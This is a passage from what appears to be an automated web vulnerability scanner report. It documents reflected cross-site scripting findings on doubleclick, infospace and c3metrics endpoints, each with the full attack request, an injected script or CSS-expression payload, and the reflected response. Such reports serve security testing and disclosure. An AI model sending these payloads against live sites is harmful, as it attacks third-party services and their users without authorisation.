Set-Cookie: cre=1_1301677315_20056:6436:8:683899_15292:30504:1:845892_19000:38838:1:845905_20053:24803:11:1035167_20054:24802:1:1035567_14598:11789:1:2308711; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: bpd=1_1301677315_h9i9:Aq40; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: apd=1_1301677315; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: scg=1_1301677315; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: ppd=1_1301677315; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: afl=1_1301677315; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Fri, 01 Apr 2011 17:01:55 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

<!-- campaign : 'landinga1c83<x style=x:expression(alert(1))>6abbaef0b4c' *not* found -->

2.32. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 15ac4<script>alert(1)</script>2c7cb34e591 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1301681747022&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-2873892966714049&slotname=Header-Logo_468x6015ac4<script>alert(1)</script>2c7cb34e591&page_slots=Header-Logo_468x60&cookie_enabled=1&url=http%3A%2F%2Fwww.androidtapp.com%2Ffavicon.icoef3b2%253Cscript%253Ealert(%2522DORK%2522)%253C%2Fscript%253Ed2de5acaa49&ref=http%3A%2F%2Fburp%2Fshow%2F38&lmt=1301699700&dt=1301681747026&cc=17&biw=1134&bih=1004&ifi=1&adk=2159343720&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154&gads=v2&ga_vid=1576293089.1301681747&ga_sid=1301681747&ga_hid=1506484284 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMedia=Coun%3ANA/Postal%3ANA/; TMediaISP=SoftLayer%20Technologies; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __utmz=251550727.1300542524.1.1.utmcsr=mgid.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=251550727.1167224488.1300542524.1300542524.1300542524.1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 01 Apr 2011 18:16:52 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
Content-Length: 2804
X-XSS-Protection: 1; mode=block

GA_googleSetAdContentsBySlotForSync({"Header-Logo_468x6015ac4<script>alert(1)</script>2c7cb34e591":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f
...[SNIP]...

2.33. http://suggest.infospace.com/QuerySuggest/SuggestServlet [reqID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://suggest.infospace.com
Path:   /QuerySuggest/SuggestServlet

Issue detail

The value of the reqID request parameter is copied into the HTML document as plain text between tags. The payload fc91e<script>alert(1)</script>dbedd732ef was submitted in the reqID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /QuerySuggest/SuggestServlet?prefix=site%3Axs&reqID=JscriptId1301677023385fc91e<script>alert(1)</script>dbedd732ef HTTP/1.1
Host: suggest.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 97
Date: Fri, 01 Apr 2011 16:57:02 GMT
Connection: close

iSuggest.PopulateResults(null, "JscriptId1301677023385fc91e<script>alert(1)</script>dbedd732ef");

2.34. http://view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 8e422<script>alert(1)</script>f34f9bd50bb was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=4808e422<script>alert(1)</script>f34f9bd50bb&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:23 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 4808e422<script>alert(1)</script>f34f9bd50bb-SM=adver_04-01-2011-18-11-23; expires=Mon, 04-Apr-2011 18:11:23 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4808e422<script>alert(1)</script>f34f9bd50bb-VT=adver_04-01-2011-18-11-23_13441394191301681483; expires=Wed, 30-Mar-2016 18:11:23 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4808e422<script>alert(1)</script>f34f9bd50bb-nUID=adver_13441394191301681483; expires=Fri, 01-Apr-2011 18:26:23 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='4808e422<script>alert(1)</script>f34f9bd50bb';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='15400897811300976568';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='13441394191301681483';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv=
...[SNIP]...

2.35. http://view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 7981b<script>alert(1)</script>31ea891ceea was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver7981b<script>alert(1)</script>31ea891ceea&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:20 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Mon, 04-Apr-2011 18:11:20 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-54_430031711301681454ZZZZadcon_04-01-2011-18-11-08_13920678781301681468ZZZZadver7981b%3Cscript%3Ealert%281%29%3C%2Fscript%3E31ea891ceea_04-01-2011-18-11-20_15585547251301681480; expires=Wed, 30-Mar-2016 18:11:20 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_430031711301681454ZZZZadcon_13920678781301681468ZZZZadver7981b%3Cscript%3Ealert%281%29%3C%2Fscript%3E31ea891ceea_15585547251301681480; expires=Fri, 01-Apr-2011 18:26:20 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver7981b<script>alert(1)</script>31ea891ceea';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='15400897811300976568';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='155855472513016
...[SNIP]...

2.36. http://view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d177f<script>alert(1)</script>3c8db14e364 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/d177f<script>alert(1)</script>3c8db14e364&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:35 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Mon, 04-Apr-2011 18:11:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadcon_04-01-2011-18-11-08_13920678781301681468ZZZZadver_04-01-2011-18-11-35_4412925081301681495; expires=Wed, 30-Mar-2016 18:11:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adcon_13920678781301681468ZZZZadver_4412925081301681495; expires=Fri, 01-Apr-2011 18:26:35 GMT; path=/; domain=c3metrics.com
Content-Length: 6679
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='4412925081301681495';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/d177f<script>alert(1)</script>3c8db14e364';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

2.37. http://view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 63583<script>alert(1)</script>77c5e15e0f0 was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=63583<script>alert(1)</script>77c5e15e0f0&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:28 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Mon, 04-Apr-2011 18:11:28 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadcon_04-01-2011-18-11-08_13920678781301681468ZZZZadver_04-01-2011-18-11-28_14327144791301681488; expires=Wed, 30-Mar-2016 18:11:28 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adcon_13920678781301681468ZZZZadver_14327144791301681488; expires=Fri, 01-Apr-2011 18:26:28 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
97811300976568';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='14327144791301681488';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='63583<script>alert(1)</script>77c5e15e0f0';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

2.38. http://view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 1d999<script>alert(1)</script>86c5c8291e2 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=721d999<script>alert(1)</script>86c5c8291e2&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:25 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Sun, 01-May-2011 19:11:25 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadcon_04-01-2011-18-11-08_13920678781301681468ZZZZadver_04-01-2011-18-11-25_11684440531301681485; expires=Wed, 30-Mar-2016 18:11:25 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adcon_13920678781301681468ZZZZadver_11684440531301681485; expires=Fri, 01-Apr-2011 18:26:25 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
his.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='15400897811300976568';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='11684440531301681485';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='721d999<script>alert(1)</script>86c5c8291e2';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

2.39. http://view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload abc86<script>alert(1)</script>be32452b256 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=abc86<script>alert(1)</script>be32452b256&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-SM=adver_04-01-2011-18-10-29; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-29_16781941211301681429; 480-nUID=adver_16781941211301681429

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:11:30 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_04-01-2011-18-10-29; expires=Mon, 04-Apr-2011 18:11:30 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadcon_04-01-2011-18-11-08_13920678781301681468ZZZZadver_04-01-2011-18-11-30_9906481791301681490; expires=Wed, 30-Mar-2016 18:11:30 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adcon_13920678781301681468ZZZZadver_9906481791301681490; expires=Fri, 01-Apr-2011 18:26:30 GMT; path=/; domain=c3metrics.com
Content-Length: 6678
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
S.c3VJSnuid='9906481791301681490';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='abc86<script>alert(1)</script>be32452b256';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

2.40. http://view.c3metrics.com/v.js [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 526ca<script>alert(1)</script>58bb247d50a was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480526ca<script>alert(1)</script>58bb247d50a&t=72 HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_03-28-2011-19-48-35_18309878591301341715

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:10:54 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1039
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480526ca<script>alert(1)</script>58bb247d50a&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://view.c3metrics.com/'+b;var r=new RegExp(a
...[SNIP]...

2.41. http://view.c3metrics.com/v.js [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 4591c<script>alert(1)</script>0799c40acaf was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver4591c<script>alert(1)</script>0799c40acaf&cid=480&t=72 HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_03-28-2011-19-48-35_18309878591301341715

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:10:51 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1039
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver4591c<script>alert(1)</script>0799c40acaf&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://view.c3metrics.com/'+b;var r=new
...[SNIP]...

2.42. http://view.c3metrics.com/v.js [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 22ab3<script>alert(1)</script>aba291a8b78 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480&t=7222ab3<script>alert(1)</script>aba291a8b78 HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_03-28-2011-19-48-35_18309878591301341715

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:10:56 GMT
Server: Apache
